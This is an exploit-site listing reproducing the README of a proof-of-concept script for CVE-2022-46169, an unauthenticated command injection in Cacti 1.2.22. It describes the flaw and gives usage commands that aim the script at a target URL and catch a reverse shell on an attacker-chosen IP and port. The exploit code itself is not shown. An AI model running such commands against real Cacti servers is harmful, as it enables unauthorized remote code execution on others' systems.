Exploit for Injection in Cacti CVE-2022-46169

Name: Exploit for Injection in Cacti CVE-2022-46169
Rating: 5 (303 reviews)
2023-04-29 | CVSS 9.8
## https://sploitus.com/exploit?id=B568D38C-7F97-55CA-922F-B33F959000C8
# CVE-2022-46169 POC

This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.

## Description

The CVE-2022-46169 vulnerability allows an unauthenticated command injection in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.

## Usage

```bash
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
```

Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.

Example:

```bash
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
```

## Disclaimer

This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script.
References

[CVE-2022-46169 - CVE entry for the vulnerability.](https://nvd.nist.gov/vuln/detail/CVE-2022-46169) \
[Cacti Security Advisories in Github](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)